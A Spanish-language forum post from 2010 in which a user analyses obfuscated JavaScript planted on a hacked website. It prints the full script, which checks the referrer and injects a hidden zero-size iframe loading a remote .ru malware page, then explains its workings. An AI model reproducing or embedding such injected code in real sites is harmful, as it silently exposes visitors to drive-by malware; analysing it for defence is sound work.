Me hackearon y dejaron un regalo. ayuda!

Iniciado por darkgx, 14 Mayo 2010, 23:06 PM

0 Miembros y 1 Visitante están viendo este tema.

cgvwzq

He mirado un poco más la parte de la web. La página en cuestión solo se muestra si existe la cabecera Referer:, y contiene el siguiente script:

Código (javascript) [Seleccionar]
try{

F53981243 = document.referrer;
Nsrd2unvt = '';
Tfym92yesygh = 'ES';
function Cr8z7f2tf8(V8vurp6x9cfrz){
  if (F53981243.indexOf(V8vurp6x9cfrz) != -1){
    Nsrd2unvt=V8vurp6x9cfrz;
   }
}
Cr8z7f2tf8('g*o7o]gXl*e7.Xr6u*'.replace(/[\*67X\]]/g, ''));
Cr8z7f2tf8('m2aDi#l2.2rDu2'.replace(/[2D#\|X]/g, ''));
Cr8z7f2tf8('y{ain)d{e)xT.CriuT'.replace(/[T\{C\)i]/g, ''));
Cr8z7f2tf8('rpaBmpb~lBepro.prou('.replace(/[\(~pBo]/g, ''));

if (Nsrd2unvt && Tfym92yesygh == 'RU'){
    window.location= 'hPtPtxpx:~/P/AleiegAhAtA.Ak~aetPaelPo~g~-edPoeseuxgxaA.Ar~ue/A?~sPtPixde=P8A8x&ArAiPdx=~2e5x5~6x'.replace(/[x~ePA]/g, '');
}else{
    Athvzpwjthi8chwh = 'http://gothguilt.ru:8080/index.php?pid=1&home=1';
    F7ipjzz32gtxvlp7amy = 24-(12*2);
    var D6ouc495shy0 = document.createElement('div');
    D6ouc495shy0.id = 'G6i85jq19fd';
    document.body.appendChild(D6ouc495shy0);
    Pygxn4t7yxe6p = 'F7ipjzz32gtxvlp7amy';
    F15fy37lsuro9 = document.createElement('i$^f@&r((^a&@$!m)$e)$(&'.replace(/\)|\$|@|\^|#|&|\!|\(/ig, ''));
    F15fy37lsuro9.src = Athvzpwjthi8chwh;
    F15fy37lsuro9.height = F7ipjzz32gtxvlp7amy;
    F15fy37lsuro9.width = F7ipjzz32gtxvlp7amy;
    document.getElementById('G6i85jq19fd').appendChild(F15fy37lsuro9);
}
}catch(e){}


Si lo limpiamos un poco, vemos que comprueba el Referrer, y en caso de que contenga 'RU' nos redireccionará a una página de rusas...xD
Sino crea un div y mete un iframe de 'http://gothguilt.ru:8080/index.php?pid=1&home=1'. Es el mismo malware que se usa en todas las páginas que he visto: la misma ofuscación, mismas comprobaciones, y al final solo dejan un iframe metido para ejecutar los comandos que quieran en la víctima que visite la página infectada...

Lo curioso es que me ha mostrado el script la primera vez, y ahora lo estoy tratando de recuperar y no puedo.

En cualquier caso la moraleja es clara: navega con proxy ruso, menos malware y más teta.
Some stuff:

  • www.a] parsed as www.a]
  • Bypass elhacker's img filter with ALT attribute!
  • ¿Para cuándo SQLi I y II? WZ